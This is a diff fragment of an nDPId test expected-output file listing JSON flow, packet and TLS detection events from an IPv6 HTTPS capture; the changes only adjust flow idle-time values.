-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127922,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269127922,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1448269127922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127922,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAYIAwAAAAAAACAI5SQBuwROHG\/ILPHEgBACniVsAAABAQgKEg1swGh+tvU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127940,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggDAAAAAAAAIAgqAA1AAAEAA3qswP\/+pw1MAbvlJMgs8cQEThxwgBAA+ZiqAAABAQgKaH9m+RINFL8="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127960,"flow_last_seen":1448269127960,"flow_idle_time":180000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1448269127960,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1448269127960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":260,"pkt_l4_len":206,"thread_ts_msec":1448269127960,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAM4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwDOCoAMj5N114hr41MJBd7sKG9JfODv2KzX0uexKi4OUzkr936AyksmjfKzejWhR1IllABVz6\/Nd8+DDPRvVbNJa4sAljMB\/byd9EnDrnASdvNnincHpyqVPP90d4TSxj+ARZa\/L622T2LNfPxOM6m\/si1ZmPjMCf2wR7DzkfTBciJe2oZugnMhbWbTFVoln8LtSZhpET4oRj3Jk\/IY0Vhm0AHAVNXjHBEt89UVS7Gr6h9OBH5HRJ1TIdTk4GJ40SQl9lgo1l4eCx0="} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1448269128003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":143,"pkt_l4_len":89,"thread_ts_msec":1448269128003,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAAFkRMyoAFFBACwwCAAAAAAAAAF8qAA1AAAEAA3qswP\/+pw1MAbvXaQBZLuIAB1nnejc74Zg5YssedTReRP0KRIf1hcs3Aafoe+Tuwy6JT\/77UOdg9PcT9s8XDyyGEBG\/Mph8KZAg9aAfxnp6BrSLMfMbzThg3fGY8Pw0dHA="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1448269128028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269128028,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwAtCd8Mj5N114hr41MKZOnBWgR9A+MJ4bypcpF9U29vj07q+fvNp9EO"} 
-00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 
-00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} 
-00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} -00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="} 
